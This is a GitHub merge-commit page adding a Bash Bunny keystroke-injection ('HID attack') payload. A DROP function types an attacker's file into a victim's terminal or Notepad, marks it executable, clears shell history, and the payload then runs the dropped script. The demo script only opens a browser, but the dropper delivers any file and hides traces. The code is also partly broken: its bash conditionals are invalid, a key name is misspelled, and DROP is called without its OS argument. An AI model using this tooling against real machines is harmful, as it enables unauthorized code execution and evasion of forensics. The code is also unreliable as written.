Merge pull request #318 from bg-wa/drop

[Extension + Payload] The Ol'Drop'n'Run
pull/252/merge
Peaks 2024-09-05 12:12:31 -04:00 committed by GitHub
commit 8d901a02a8
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 140 additions and 0 deletions

103
payloads/extensions/drop.sh Normal file
View File

@ -0,0 +1,103 @@
#!/bin/bash
#
# DROP v1 by bg-wa
# Simplifies dropping files from HID attacks for LINUX
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
#
# Example:
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
source ./run.sh
function DROP() {
os=$1
source=$2
destination=$3
overwrite=$4
executable=$5
case "$os" in
WIN)
RUN WIN powershell
;;
OSX)
RUN OSX terminal
;;
UNITY)
RUN UNITY terminal
;;
LINUX)
RUN LINUX terminal
;;
*)
RUN UNITY terminal
;;
esac
QUACK DELAY 1000
if "$overwrite" == "true"
then
case "$os" in
WIN)
QUACK STRING del "$destination"
;;
*)
QUACK STRING rm "$destination"
;;
esac
QUACK ENTER
QUACK DELAY 500
fi
case "$os" in
WIN)
QUACK STRING fsutil file createnew "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING notepad.exe "$destination"
QUACK ENTER
QUACK DELAY 1000
;;
*)
QUACK STRING vi "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING i
;;
esac
while IFS= read -r data
do
QUACK STRING "$data"
QUACK ENTER
done < "$source"
QUACK DELAY 500
case "$os" in
WIN)
QUACK CTRL s
QUACK CRTL x
;;
*)
QUACK ESC
QUACK ENTER
QUACK STRING :wq
QUACK ENTER
if "$executable" == "true"
then
QUACK STRING chmod +x "$destination"
QUACK ENTER
QUACK DELAY 500
fi
QUACK STRING history -c
QUACK ENTER
QUACK STRING exit
QUACK ENTER
;;
esac
}
export -f DROP

View File

@ -0,0 +1,7 @@
#!/bin/bash
# Wake up and do something productive here instead...
sleep 10
# boom!!
firefox "http://hak5.org"

View File

@ -0,0 +1,30 @@
#!/bin/bash
#
# Title: The Ol'Drop'n'Run
# Author: bg-wa
# Version: 1.0
# Category: HID
# Target: UNITY
# Attackmodes: HID
#
# Quick HID only attack to write a file to target machine and open
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | SETUP | Open vi |
# | ATTACK | Writing files |
# | FINISH | Payload Dropped & ran (remove the bunny) |
#
ATTACKMODE HID
LED SETUP
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
target_script=\~/fuse.sh
LED ATTACK
DROP $source_script $target_script true true
RUN UNITY $target_script
LED FINISH